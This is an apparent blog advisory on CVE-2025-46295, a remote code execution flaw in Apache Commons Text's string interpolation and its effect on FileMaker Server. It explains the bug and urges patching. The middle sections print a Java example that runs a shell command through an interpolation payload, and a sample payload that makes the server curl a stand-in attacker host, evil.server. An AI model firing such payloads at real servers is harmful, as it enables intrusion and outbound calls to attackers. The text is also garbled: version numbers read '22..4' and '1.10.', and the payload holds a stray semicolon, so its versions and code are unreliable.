CVE-2025-46295 - How Apache Commons Text Vulnerability Put FileMaker Server at Risk

CVE-2025-46295 is the identifier for a high-risk vulnerability in Apache Commons Text, a widely used Java library. In this long read, we’ll break down what caused the issue, show you a real code example, and explain how attackers could exploit it—especially in the context of FileMaker Server, which patched this hole in version 22..4.

What is Apache Commons Text?

Apache Commons Text is a library that gives Java developers handy tools for working with and manipulating strings. One of its big features is “string interpolation”—basically, the ability to substitute variables or commands using placeholders in text, like ${name}.

The Danger: Interpolation Abuse Before 1.10.

Before version 1.10., Commons Text included "interpolators" that would process not only variable lookups but also commands and resource URLs.

Here’s the trap: if an application feeds _untrusted input_ (like user input) to the text interpolation feature, a malicious user could craft inputs that get executed—think running system commands or hitting external servers.

Why does this matter? If you’re using a vulnerable version, a bad actor could potentially run code on your server. That’s called remote code execution (RCE), which is one of the worst things that can happen to an application server.

Here’s a simplified example in Java of how this can go wrong

import org.apache.commons.text.StringSubstitutor;

public class VulnerableExample {
    public static void main(String[] args) {
        // Imagine 'input' comes from a user:
        String input = "${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/pwned')}";

        // This function is dangerous!
        StringSubstitutor substitutor = new StringSubstitutor();
        String output = substitutor.replace(input);

        System.out.println(output);
    }
}

When replace() runs, it actually tries to execute the embedded command.

- In real-world servers with a vulnerable setup, this could create files, open connections, or even take over your whole system.

How Attackers Exploit This

A malicious user could send specially crafted data (usually via a web form or API call) where a server-side vulnerable Java app calls the interpolation API directly on user input.

Example exploit payload

${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://evil.server/1234';)}

This would make the server connect out to an attacker’s system!

Impact on FileMaker Server

FileMaker Server, a database and app server from Claris (an Apple subsidiary), used an unsafe version of Apache Commons Text. If you used FileMaker Server before version _22..4_, your server may have been at risk for RCE if it passed unfiltered input to interpolation APIs anywhere in its Java components.

Patched Version:
FileMaker Server fixed this in version 22..4.

References

- Apache Commons Text Security Page
- FileMaker Server 22..4 Release Notes
- OSS Security Mailing List Post about Commons Text Flaw

Conclusion

CVE-2025-46295 is a clear reminder that seemingly helpful features (like text interpolation) can become dangerous if not handled carefully. Always validate your library versions, avoid ever letting untrusted input reach sensitive APIs, and patch quickly!

If you run FileMaker Server or use Apache Commons Text anywhere in your Java stack, update now—or your server could be someone else’s playground.

Timeline

Published on: 12/16/2025 18:16:12 UTC
Last modified on: 12/18/2025 15:08:06 UTC